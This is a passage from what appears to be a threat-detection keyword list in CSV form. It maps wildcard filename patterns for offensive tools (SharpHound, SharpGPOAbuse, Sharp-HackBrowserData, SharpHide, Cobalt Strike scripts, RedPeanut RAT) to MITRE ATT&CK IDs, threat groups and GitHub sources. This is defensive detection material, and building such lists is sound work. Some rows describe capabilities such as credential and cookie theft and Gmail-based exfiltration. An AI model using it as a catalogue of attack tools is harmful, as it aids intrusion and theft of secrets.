- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*sharpgen.enable_cache*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*sharpgen.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*sharpgen.set_location*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*SharpGmailC2-main*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"*SharpGPOAbuse.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpGPOAddComputer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpGPOAddLocalAdmin*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpGPOAddUser*Manager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Sharp-HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" +"*Sharp-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*SharpHandler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpHide.csproj*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*SharpHide.exe*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*SharpHide.sln*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*SharpHide-master*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*SharpHide-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*SharpHose.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharphound -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpHound-*.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharphound*--stealth*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharphound.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHound.cna*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*SharpHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*SharpHound.exe*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*SharpHound.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SharpHound.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpHound.exe*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHound.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*SharpHound.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*SharpHound.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SharpHound.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*SharpHound.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHound.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*SharpHound2*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Sharphound2.*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*SharpHound3*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Sharphound-Aggressor*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*SharpHoundCommon.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHoundCommonLib*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharpinline *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Sharpkatz*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 